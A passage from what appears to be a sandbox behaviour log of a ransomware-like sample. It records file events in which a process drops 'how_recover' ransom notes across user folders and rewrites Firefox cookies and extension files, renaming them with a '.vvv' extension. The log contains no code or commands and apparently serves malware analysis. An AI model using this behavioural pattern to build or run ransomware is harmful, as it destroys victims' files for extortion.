- sequenceNumber: 983
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778307
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71754
- mode: created
- sequenceNumber: 984
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778308
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71761
- mode: close
- sequenceNumber: 985
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778308
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71771
- mode: created
- sequenceNumber: 986
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778309
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71776
- mode: close
- sequenceNumber: 987
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778309
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71802
- mode: created
- sequenceNumber: 988
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778310
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71810
- mode: close
- sequenceNumber: 989
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778310
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71819
- mode: created
- sequenceNumber: 990
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Templates\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778311
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71824
- mode: close
- sequenceNumber: 991
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Templates\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778311
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71831
- mode: created
- sequenceNumber: 992
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Templates\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778312
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71837
- mode: close
- sequenceNumber: 993
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Templates\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778312
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71844
- mode: created
- sequenceNumber: 994
- value: C:\Documents and Settings\admin\Application Data\Microsoft\UProof\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778313
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71850
- mode: close
- sequenceNumber: 995
- value: C:\Documents and Settings\admin\Application Data\Microsoft\UProof\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778313
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71856
- mode: created
- sequenceNumber: 996
- value: C:\Documents and Settings\admin\Application Data\Microsoft\UProof\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778314
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71862
- mode: close
- sequenceNumber: 997
- value: C:\Documents and Settings\admin\Application Data\Microsoft\UProof\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778314
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71870
- mode: created
- sequenceNumber: 998
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\STARTUP\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778315
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71876
- mode: close
- sequenceNumber: 999
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\STARTUP\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778315
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71984
- mode: created
- sequenceNumber: 1000
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\STARTUP\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778316
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71990
- mode: close
- sequenceNumber: 1001
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\STARTUP\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778316
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71997
- mode: created
- sequenceNumber: 1002
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778317
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72002
- mode: close
- sequenceNumber: 1003
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778317
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72009
- mode: created
- sequenceNumber: 1004
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778318
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72014
- mode: close
- sequenceNumber: 1005
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Word\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778318
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72021
- mode: created
- sequenceNumber: 1006
- value: C:\Documents and Settings\admin\Application Data\Microsoft\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778319
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72027
- mode: close
- sequenceNumber: 1007
- value: C:\Documents and Settings\admin\Application Data\Microsoft\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778319
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 72329
- repeat: 70
- sequenceNumber: 1008
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 72334
- mode: created
- sequenceNumber: 1009
- value: C:\Documents and Settings\admin\Application Data\Microsoft\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778320
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72339
- mode: close
- sequenceNumber: 1010
- value: C:\Documents and Settings\admin\Application Data\Microsoft\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778320
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72348
- mode: created
- sequenceNumber: 1011
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778321
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72354
- mode: close
- sequenceNumber: 1012
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778321
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72362
- mode: created
- sequenceNumber: 1013
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778322
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72396
- mode: close
- sequenceNumber: 1014
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778322
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72403
- mode: created
- sequenceNumber: 1015
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778323
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72408
- mode: close
- sequenceNumber: 1016
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778323
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72434
- mode: created
- sequenceNumber: 1017
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778324
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72440
- mode: close
- sequenceNumber: 1018
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778324
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72448
- mode: created
- sequenceNumber: 1019
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Crash Reports\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778325
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72454
- mode: close
- sequenceNumber: 1020
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Crash Reports\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778325
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72461
- mode: created
- sequenceNumber: 1021
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Crash Reports\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778326
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72468
- mode: close
- sequenceNumber: 1022
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Crash Reports\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778326
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72479
- mode: created
- sequenceNumber: 1023
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\bookmarkbackups\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778327
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72486
- mode: close
- sequenceNumber: 1024
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\bookmarkbackups\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778327
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72503
- mode: created
- sequenceNumber: 1025
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\bookmarkbackups\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778328
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72510
- mode: close
- sequenceNumber: 1026
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\bookmarkbackups\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778328
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72518
- mode: open
- sequenceNumber: 1027
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\cookies.txt
- filesize: 157
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478846
- ntstatus: 0x0
- CreateOptions: 0x200000
- file:
- timestamp: 72537
- mode: close
- sequenceNumber: 1028
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\cookies.txt
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478846
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72550
- mode: rename
- sequenceNumber: 1029
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\cookies.txt
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\cookies.txt.vvv
- ads:
- fid (ads:): 562949953478846
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72583
- mode: open
- sequenceNumber: 1030
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\bootstrap.js
- filesize: 5393
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476264
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72614
- mode: close
- sequenceNumber: 1031
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\bootstrap.js
- filesize: 5822
- md5sum: 3e799e17a82a4e8a3595802266a8f066
- sha1sum: 7080d12586517dcb6d9334ade726e160e835a55f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476264
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72624
- mode: rename
- sequenceNumber: 1032
- filesize: 5822
- md5sum: 3e799e17a82a4e8a3595802266a8f066
- sha1sum: 7080d12586517dcb6d9334ade726e160e835a55f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\bootstrap.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\bootstrap.js.vvv
- ads:
- fid (ads:): 562949953476264
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72647
- mode: open
- sequenceNumber: 1033
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\harness.js
- filesize: 19915
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765892
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72673
- mode: close
- sequenceNumber: 1034
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\harness.js
- filesize: 20334
- md5sum: 1ce612d9b1a3f15eebd0f2012d8b901f
- sha1sum: b33e755531741122dcebeb0dc22386de29ab6a4a
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765892
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72686
- mode: rename
- sequenceNumber: 1035
- filesize: 20334
- md5sum: 1ce612d9b1a3f15eebd0f2012d8b901f
- sha1sum: b33e755531741122dcebeb0dc22386de29ab6a4a
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\harness.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\harness.js.vvv
- ads:
- fid (ads:): 281474976765892
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72700
- mode: created
- sequenceNumber: 1036
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778329
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72707
- mode: close
- sequenceNumber: 1037
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778329
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72730
- mode: created
- sequenceNumber: 1038
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778330
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72737
- mode: close
- sequenceNumber: 1039
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778330
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72805
- mode: open
- sequenceNumber: 1040
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\test-page-worker.js
- filesize: 905
- processinfo:
- pid: 1056
